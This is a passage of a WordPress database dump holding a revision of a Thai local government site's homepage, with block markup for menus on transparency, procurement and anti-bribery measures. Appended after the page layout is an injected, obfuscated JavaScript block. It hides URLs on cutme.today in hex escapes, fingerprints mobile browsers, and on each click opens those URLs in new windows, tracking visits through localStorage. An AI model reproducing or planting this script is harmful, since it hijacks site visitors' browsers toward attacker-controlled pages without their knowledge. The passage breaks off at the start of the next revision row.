{\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":180},\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"headingText\":\"New Posts\",\"headingStyle\":\"heading4\",\"taxotermfSize\":{\"md\":12}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:15:24','2024-07-27 04:15:24','',14,'http://pakhaeng.ssk.in.th/?p=84',0,'revision','',0),
(85,1,'2024-07-27 11:15:51','2024-07-27 04:15:51','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container 